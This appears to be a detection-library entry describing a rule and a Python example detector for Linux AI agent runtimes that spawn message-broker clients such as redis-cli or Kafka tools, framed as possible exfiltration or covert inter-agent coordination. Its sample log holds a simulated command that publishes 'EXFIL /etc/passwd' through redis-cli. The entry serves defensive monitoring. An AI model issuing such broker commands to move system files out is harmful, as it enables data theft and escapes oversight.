Detection Library
Severity: medium · Status: experimental · Platform: Linux · Source: OCI · ATT&CK technique: T1071.001

Linux Agent Invoking Queue Or Broker Clients

Detects AI agent runtimes spawning message queue or broker client tools (kafka, rabbitmq, nats, mqtt, redis-cli), which may indicate unauthorized use of messaging infrastructure for inter-agent coordination or data exfiltration.

Updated Jan 10, 2025 · OCI AI Security Team

Tags: agentic-ai, inter-agent, message-queue, kafka, redis, linux, oci, owasp-asi07

Problem Statement

Message queues provide a persistent, scalable channel for inter-agent communication that may lack access controls or audit logging. An AI agent using message brokers outside its specification may be participating in a distributed attack coordinated across multiple compromised agents.

Sample Logs

{"timestamp":"2025-01-10T11:40:00Z","computer_name":"oci-worker-33","user":"agent_svc","image":"/usr/bin/redis-cli","command_line":"redis-cli -h 10.0.2.50 PUBLISH agent_commands 'EXFIL /etc/passwd'","parent_image":"/usr/bin/python3"}

Required Fields

image
command_line
parent_image
user
computer_name

False Positives

  • Event-driven agent architectures that legitimately use message queues for task distribution
  • Data pipeline agents that publish results to message brokers as part of approved workflows

Tuning Guidance

If message queue usage is expected, monitor the queue topics and message content for anomalous patterns. Alert on connections to broker hosts not in the approved infrastructure list.
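The detection described above (a broker client spawned by an agent runtime) combined with the tuning rule in this section (suppress approved broker hosts), as an added example that is not the library's own rule logic. The client and runtime names, the host flags, and the approved-broker list are assumptions to be adapted to your environment; the sample events are constructed (the first is this page's sample log).

```python
import json
import shlex
from os.path import basename

# Assumed lists, not the rule's own: broker client binaries and agent runtime parents.
BROKER_CLIENTS = {"redis-cli", "kafka-console-producer.sh", "kafka-console-consumer.sh",
                  "rabbitmqadmin", "rabbitmqctl", "nats", "mosquitto_pub", "mosquitto_sub"}
AGENT_RUNTIMES = {"python3", "python", "node"}

# Tuning list: broker hosts that belong to approved infrastructure (constructed value).
APPROVED_BROKERS = {"10.0.5.10"}

# Flags under which these clients name their broker (assumed; verify against your tooling).
HOST_FLAGS = ("-h", "--host", "--bootstrap-server", "--server")

def broker_host(command_line):
    """Return the broker host named on a client command line, or None."""
    argv = shlex.split(command_line)
    for i, arg in enumerate(argv):
        if arg in HOST_FLAGS and i + 1 < len(argv):
            return argv[i + 1].split(":")[0]          # strip ":port"
        for flag in HOST_FLAGS:
            if arg.startswith(flag + "="):
                return arg.split("=", 1)[1].split(":")[0]
    return None

def evaluate(event):
    """Alert when an agent runtime spawns a broker client toward a non-approved broker."""
    if basename(event["image"]) not in BROKER_CLIENTS:
        return None
    if basename(event["parent_image"]) not in AGENT_RUNTIMES:
        return None
    host = broker_host(event["command_line"])
    if host in APPROVED_BROKERS:
        return None                                   # expected usage: tuned out
    return {"user": event["user"], "computer_name": event["computer_name"],
            "client": basename(event["image"]), "broker": host or "unknown"}

# Constructed sample events: the page's log, an approved-broker publish, and a human shell.
SAMPLE_LOGS = [
    '{"timestamp":"2025-01-10T11:40:00Z","computer_name":"oci-worker-33","user":"agent_svc","image":"/usr/bin/redis-cli","command_line":"redis-cli -h 10.0.2.50 PUBLISH agent_commands \'EXFIL /etc/passwd\'","parent_image":"/usr/bin/python3"}',
    '{"timestamp":"2025-01-10T11:41:00Z","computer_name":"oci-worker-34","user":"agent_svc","image":"/usr/bin/redis-cli","command_line":"redis-cli -h 10.0.5.10 PUBLISH task_results done","parent_image":"/usr/bin/python3"}',
    '{"timestamp":"2025-01-10T11:42:00Z","computer_name":"oci-worker-35","user":"ops","image":"/usr/bin/redis-cli","command_line":"redis-cli -h 10.0.2.50 PING","parent_image":"/usr/bin/bash"}',
]

def run(lines=SAMPLE_LOGS):
    """Parse JSON events and return the alerts they produce."""
    return [a for a in (evaluate(json.loads(line)) for line in lines) if a]

if __name__ == "__main__":
    for alert in run():
        print(alert)
```

Only the first sample fires: the second targets an approved broker and the third is spawned by an interactive shell rather than an agent runtime.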